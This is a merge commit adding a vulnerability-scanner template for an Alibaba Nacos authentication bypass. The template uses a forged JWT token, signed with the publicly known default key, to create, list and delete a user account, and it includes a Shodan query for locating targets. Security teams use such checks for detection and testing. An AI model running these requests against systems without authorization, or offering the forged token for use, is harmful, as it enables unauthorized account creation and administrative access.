Merge pull request #8106 from projectdiscovery/nacos-create-user

Create nacos-create-user.yaml

http/misconfiguration/nacos/nacos-create-user.yaml

@@ -0,0 +1,42 @@
+id: nacos-create-user
+
+info:
+  name: Alibaba Nacos - Unauthorized Account Creation
+  author: SleepingBag945
+  severity: high
+  description: |
+    Nacos uses a fixed JWT token key to authenticate users in the default configuration. Since Nacos is an open source project, the key is publicly known, so unauthorized attackers can use this fixed key to forge any user identity Log in to Nacos to manage and operate background interface functions.
+  reference:
+    - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/nacos-token-create-user.yaml
+  metadata:
+    max-request: 1
+    verified: true
+    shodan-query: title:"Nacos"
+  tags: nacos,unauth,bypass,instrusive
+
+http:
+  - raw:
+      - |
+        POST /nacos/v1/auth/users/?username={{randstr_1}}&password={{randstr_2}}&accessToken={{token}} HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /nacos/v1/auth/users?pageNo=1&pageSize=9&search=blur&accessToken={{token}} HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        DELETE /nacos/v1/auth/users/?username={{randstr_1}}&accessToken={{token}} HTTP/1.1
+        Host: {{Hostname}}
+
+    payloads:
+      token:
+        - eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY5ODg5NDcyN30.feetKmWoPnMkAebjkNnyuKo6c21_hzTgu0dfNqbdpZQ
+    attack: pitchfork
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "status_code_1 == 200 && contains(body_1,'create user ok!')"
+          - "status_code_3 == 200 && contains(body_3,'delete user ok!')"
+        condition: and